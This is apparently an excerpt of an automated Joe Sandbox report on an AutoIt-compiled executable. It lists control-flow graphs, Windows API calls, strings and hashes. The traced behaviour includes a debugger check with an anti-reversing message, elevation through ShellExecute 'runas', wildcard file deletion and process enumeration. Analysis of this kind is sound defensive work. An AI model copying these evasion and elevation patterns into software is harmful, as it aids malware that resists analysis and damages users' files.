104899 ff07d0 104897->104899 104958 ff073f 104898->104958 104899->104898 104965 fdf649 20 API calls __dosmaperr 104899->104965 104902 ff07df 104966 fe2b5c 26 API calls ___std_exception_copy 104902->104966 104904 ff0822 104905 ff0851 104904->104905 104967 fdf649 20 API calls __dosmaperr 104904->104967 104913 ff08a4 104905->104913 104969 fdda7d 26 API calls 2 library calls 104905->104969 104908 ff089f 104910 ff091e 104908->104910 104908->104913 104909 ff0846 104968 fe2b5c 26 API calls ___std_exception_copy 104909->104968 104970 fe2b6c 11 API calls _abort 104910->104970 104913->104850 104913->104851 104914 ff092a 104916 fe55a0 __FrameHandler3::FrameUnwindToState 104915->104916 104973 fe32d1 EnterCriticalSection 104916->104973 104918 fe55ee 104974 fe569d 104918->104974 104920 fe55a7 104920->104918 104921 fe55cc 104920->104921 104925 fe563a EnterCriticalSection 104920->104925 104923 fe5373 __wsopen_s 21 API calls 104921->104923 104922 fe5617 __fread_nolock 104922->104854 104924 fe55d1 104923->104924 104924->104918 104977 fe54ba EnterCriticalSection 104924->104977 104925->104918 104926 fe5647 LeaveCriticalSection 104925->104926 104926->104920 104928->104869 104929->104855 104930->104885 104931->104861 104932->104855 104933->104874 104934->104855 104935->104870 104936->104878 104937->104876 104938->104877 104939->104881 104941 fe5737 __wsopen_s 26 API calls 104940->104941 104943 fe8a3e 104941->104943 104942 fe8a44 104979 fe56a6 21 API calls 3 library calls 104942->104979 104943->104942 104945 fe5737 __wsopen_s 26 API calls 104943->104945 104954 fe8a76 104943->104954 104948 fe8a6d 104945->104948 104946 fe5737 __wsopen_s 26 API calls 104949 fe8a82 CloseHandle 104946->104949 104947 fe8a9c 104951 fe8abe 104947->104951 104980 fdf613 20 API calls 2 library calls 104947->104980 104952 fe5737 __wsopen_s 26 API calls 104948->104952 104949->104942 104953 fe8a8e GetLastError 104949->104953 104951->104885 104952->104954 104953->104942 104954->104942 104954->104946 104955->104888 
104956->104892 104957->104889 104960 ff0757 104958->104960 104959 ff0772 104959->104904 104960->104959 104971 fdf649 20 API calls __dosmaperr 104960->104971 104962 ff0796 104972 fe2b5c 26 API calls ___std_exception_copy 104962->104972 104964 ff07a1 104964->104904 104965->104902 104966->104898 104967->104909 104968->104905 104969->104908 104970->104914 104971->104962 104972->104964 104973->104920 104978 fe3319 LeaveCriticalSection 104974->104978 104976 fe56a4 104976->104922 104977->104918 104978->104976 104979->104947 104980->104951 104632 fbf5e5 104635 fbcab0 104632->104635 104636 fbcacb 104635->104636 104637 100150c 104636->104637 104638 10014be 104636->104638 104664 fbcaf0 104636->104664 104675 10362ff 224 API calls 2 library calls 104637->104675 104641 10014c8 104638->104641 104644 10014d5 104638->104644 104638->104664 104673 1036790 224 API calls 104641->104673 104643 fcbc58 8 API calls 104643->104664 104657 fbcdc0 104644->104657 104674 1036c2d 224 API calls 2 library calls 104644->104674 104647 100179f 104647->104647 104649 fbcf80 39 API calls 104649->104664 104652 fbcdee 104653 10016e8 104678 1036669 81 API calls 104653->104678 104656 fbbe2d 39 API calls 104656->104664 104657->104652 104679 1023fe1 81 API calls __wsopen_s 104657->104679 104661 fce807 39 API calls 104661->104664 104662 fc0340 224 API calls 104662->104664 104663 fbbed9 8 API calls 104663->104664 104664->104643 104664->104649 104664->104652 104664->104653 104664->104656 104664->104657 104664->104661 104664->104662 104664->104663 104666 fce7c1 39 API calls 104664->104666 104667 fcaa99 224 API calls 104664->104667 104668 fd05b2 5 API calls __Init_thread_wait 104664->104668 104669 fd0413 29 API calls __onexit 104664->104669 104670 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104664->104670 104671 fcf4df 81 API calls 104664->104671 104672 fcf346 224 API calls 104664->104672 104676 fbb4c8 8 API calls 104664->104676 104677 100ffaf 8 API calls 104664->104677 104666->104664 
104667->104664 104668->104664 104669->104664 104670->104664 104671->104664 104672->104664 104673->104644 104674->104657 104675->104664 104676->104664 104677->104664 104678->104657 104679->104647 104981 fb1044 104986 fb2793 104981->104986 104983 fb104a 105022 fd0413 29 API calls __onexit 104983->105022 104985 fb1054 105023 fb2a38 104986->105023 104990 fb280a 104991 fbbf73 8 API calls 104990->104991 104992 fb2814 104991->104992 104993 fbbf73 8 API calls 104992->104993 104994 fb281e 104993->104994 104995 fbbf73 8 API calls 104994->104995 104996 fb2828 104995->104996 104997 fbbf73 8 API calls 104996->104997 104998 fb2866 104997->104998 104999 fbbf73 8 API calls 104998->104999 105000 fb2932 104999->105000 105033 fb2dbc 105000->105033 105004 fb2964 105005 fbbf73 8 API calls 105004->105005 105006 fb296e 105005->105006 105007 fc3160 9 API calls 105006->105007 105008 fb2999 105007->105008 105060 fb3166 105008->105060 105010 fb29b5 105011 fb29c5 GetStdHandle 105010->105011 105012 ff39e7 105011->105012 105015 fb2a1a 105011->105015 105013 ff39f0 105012->105013 105012->105015 105014 fd014b 8 API calls 105013->105014 105016 ff39f7 105014->105016 105017 fb2a27 OleInitialize 105015->105017 105067 1020ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 105016->105067 105017->104983 105019 ff3a00 105068 10212eb CreateThread 105019->105068 105021 ff3a0c CloseHandle 105021->105015 105022->104985 105069 fb2a91 105023->105069 105026 fb2a91 8 API calls 105027 fb2a70 105026->105027 105028 fbbf73 8 API calls 105027->105028 105029 fb2a7c 105028->105029 105030 fb8577 8 API calls 105029->105030 105031 fb27c9 105030->105031 105032 fb327e 6 API calls 105031->105032 105032->104990 105034 fbbf73 8 API calls 105033->105034 105035 fb2dcc 105034->105035 105036 fbbf73 8 API calls 105035->105036 105037 fb2dd4 105036->105037 105076 fb81d6 105037->105076 105040 fb81d6 8 API calls 105041 fb2de4 105040->105041 105042 fbbf73 8 API calls 
105041->105042 105043 fb2def 105042->105043 105044 fd014b 8 API calls 105043->105044 105045 fb293c 105044->105045 105046 fb3205 105045->105046 105047 fb3213 105046->105047 105048 fbbf73 8 API calls 105047->105048 105049 fb321e 105048->105049 105050 fbbf73 8 API calls 105049->105050 105051 fb3229 105050->105051 105052 fbbf73 8 API calls 105051->105052 105053 fb3234 105052->105053 105054 fbbf73 8 API calls 105053->105054 105055 fb323f 105054->105055 105056 fb81d6 8 API calls 105055->105056 105057 fb324a 105056->105057 105058 fd014b 8 API calls 105057->105058 105059 fb3251 RegisterWindowMessageW 105058->105059 105059->105004 105061 ff3c8f 105060->105061 105062 fb3176 105060->105062 105079 1023c4e 8 API calls 105061->105079 105064 fd014b 8 API calls 105062->105064 105066 fb317e 105064->105066 105065 ff3c9a 105066->105010 105067->105019 105068->105021 105080 10212d1 14 API calls 105068->105080 105070 fbbf73 8 API calls 105069->105070 105071 fb2a9c 105070->105071 105072 fbbf73 8 API calls 105071->105072 105073 fb2aa4 105072->105073 105074 fbbf73 8 API calls 105073->105074 105075 fb2a66 105074->105075 105075->105026 105077 fbbf73 8 API calls 105076->105077 105078 fb2ddc 105077->105078 105078->105040 105079->105065

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 00FB5FF7
  • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
• GetCurrentProcess.KERNEL32(?,0104DC2C,00000000,?,?), ref: 00FB6123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 00FB612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00FB6155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FB6167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00FB6175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 00FB617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 00FB61A1
Memory Dump Source
• Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 187648f1bb84ba47a362f0cfc98f039e028d42c2150096fada6831cb4e838ce4
• Instruction ID: 2affcc8f05d80c32117cce228c64ed38e7d51168d20c847bc2be09e6fb06168b
• Opcode Fuzzy Hash: 187648f1bb84ba47a362f0cfc98f039e028d42c2150096fada6831cb4e838ce4
• Instruction Fuzzy Hash: 49A1917290E6D4DFC732CBAA74612ED3FA46B36710B08C899D5C1A721AC62F4548EF35

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00FB3368,?), ref: 00FB33BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00FB3368,?), ref: 00FB33CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,01082418,01082400,?,?,?,?,?,?,00FB3368,?), ref: 00FB343A
  • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
  • Part of subcall function 00FB425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FB3462,01082418,?,?,?,?,?,?,?,00FB3368,?), ref: 00FB42A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,01082418,?,?,?,?,?,?,?,00FB3368,?), ref: 00FB34BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00FF3CB0
• SetCurrentDirectoryW.KERNEL32(?,01082418,?,?,?,?,?,?,?,00FB3368,?), ref: 00FF3CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,010731F4,01082418,?,?,?,?,?,?,?,00FB3368), ref: 00FF3D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00FF3D81
  • Part of subcall function 00FB34D3: GetSysColorBrush.USER32(0000000F), ref: 00FB34DE
  • Part of subcall function 00FB34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00FB34ED
  • Part of subcall function 00FB34D3: LoadIconW.USER32(00000063), ref: 00FB3503
  • Part of subcall function 00FB34D3: LoadIconW.USER32(000000A4), ref: 00FB3515
  • Part of subcall function 00FB34D3: LoadIconW.USER32(000000A2), ref: 00FB3527
  • Part of subcall function 00FB34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB353F
  • Part of subcall function 00FB34D3: RegisterClassExW.USER32(?), ref: 00FB3590
  • Part of subcall function 00FB35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB35E1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3602
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB3368,?), ref: 00FB3616
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00FB3368,?), ref: 00FB361F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB3A3C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • AutoIt, xrefs: 00FF3CA5
                                                                                                                                                                                                                                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00FF3CAA
                                                                                                                                                                                                                                                                                                        • runas, xrefs: 00FF3D75
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                                                                                                                                                                                                                                        • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                                        • Opcode ID: 20b32a772c44092391d729b54d7fa9c7aa020d257f964fc11d31f327b2a4e090
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0b1c3aeef545d1e3aab8ef70ac95cc7929e9e1d32f39d3cf6aa915f3254a513c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20b32a772c44092391d729b54d7fa9c7aa020d257f964fc11d31f327b2a4e090
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E51127164C344AAD621FF66DC41DFE7BB8AF94710F00141CF6C296166DF2E8A49EB22

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 1026 101dc54-101dc9b call fbbf73 * 3 call fb5851 call 101eab0 1037 101dcab-101dcdc call fb568e FindFirstFileW 1026->1037 1038 101dc9d-101dca6 call fb6b7c 1026->1038 1042 101dd4b-101dd52 FindClose 1037->1042 1043 101dcde-101dce0 1037->1043 1038->1037 1044 101dd56-101dd78 call fbbd98 * 3 1042->1044 1043->1042 1045 101dce2-101dce7 1043->1045 1047 101dd26-101dd38 FindNextFileW 1045->1047 1048 101dce9-101dd24 call fbbed9 call fb7bb5 call fb6b7c DeleteFileW 1045->1048 1047->1043 1049 101dd3a-101dd40 1047->1049 1048->1047 1061 101dd42-101dd49 FindClose 1048->1061 1049->1043 1061->1044
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB55D1,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00FB5871
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101EAB0: GetFileAttributesW.KERNEL32(?,0101D840), ref: 0101EAB1
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0101DCCB
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0101DD1B
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0101DD2C
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0101DD43
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0101DD4C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                                        • Opcode ID: eda99e3c664438baeb4ae2274741a5ae83093073c16b61983c284698ac554918
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0cd14049261412c4ebd47268481040e9f60127e98d16e7271b012277568c149d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eda99e3c664438baeb4ae2274741a5ae83093073c16b61983c284698ac554918
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF31AE31008345ABC301FFA5CD858EFB7E8BEA5300F404D5DF5D182191EB69DA09DB62
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0101DDAC
                                                                                                                                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0101DDBA
                                                                                                                                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0101DDDA
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0101DE87
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3150c062f25313f3935006a1f15b2db3ab53546da4e94f36f6d5745506f14a3d
                                                                                                                                                                                                                                                                                                        • Instruction ID: cce61db01444c849ee89e53a02ffb34f8561bec8476d77c6ac179c69088b3c03
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3150c062f25313f3935006a1f15b2db3ab53546da4e94f36f6d5745506f14a3d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96319171108301AFD311EF94CC85AAFBBE8AF99340F04092DF5C1831A1DB7AD949CB92
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                        • Instruction ID: f3686968394aa8d3583fd9473a6eb451edcfb489d4363c7b45347a76e3886a48
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1531C771A00105EBC718DF58D488B69FBA6FB49310F2886A6E409CB352DB71EDC1EBC0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetInputState.USER32 ref: 00FBEF07
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00FBF107
                                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBF228
                                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00FBF27B
                                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00FBF289
                                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FBF29F
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00FBF2B1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 766709d1e04f4022f094ed87d1b1c41d0a5c8940eb4774b8af07c75c9e8d95a8
                                                                                                                                                                                                                                                                                                        • Instruction ID: 30c9f4216c585110f17c51b67cb500f27dc6910a98f7e7975d77c6e4f4720c20
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 766709d1e04f4022f094ed87d1b1c41d0a5c8940eb4774b8af07c75c9e8d95a8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6532F270A08242EFE726DF25CC84BEABBE1BF81314F14456DE5958B291C775E848DF82

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00FB3657
                                                                                                                                                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00FB3681
                                                                                                                                                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB3692
                                                                                                                                                                                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00FB36AF
                                                                                                                                                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB36BF
                                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00FB36D5
                                                                                                                                                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB36E4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                                        • Opcode ID: 73317a637ef3aa93f855066703ccae0dab8c93b7927e2830cc29c0fb5415ae8e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 4647a11bfb8117fdbfecb2fc113b86f9d9a7df64232ce6cd8b8d5aa2b32c0e59
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73317a637ef3aa93f855066703ccae0dab8c93b7927e2830cc29c0fb5415ae8e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 532103B5D05348AFDB20DFE4E989BDDBBB4FB18750F00511AFA91A6284E7BA4540CF90

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FF071A: CreateFileW.KERNEL32(00000000,00000000,?,00FF0A84,?,?,00000000,?,00FF0A84,00000000,0000000C), ref: 00FF0737
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FF0AEF
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FF0AF6
                                                                                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00FF0B02
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FF0B0C
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FF0B15
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00FF0B35
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00FF0C7F
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FF0CB1
                                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00FF0CB8
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                                                                        • API String ID: 4237864984-2852464175

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00FB55B2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FB525A
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FB53C4
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FF4BFD
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FF4C3E
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00FF4C80
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00FF4CE7
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00FF4CF6
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
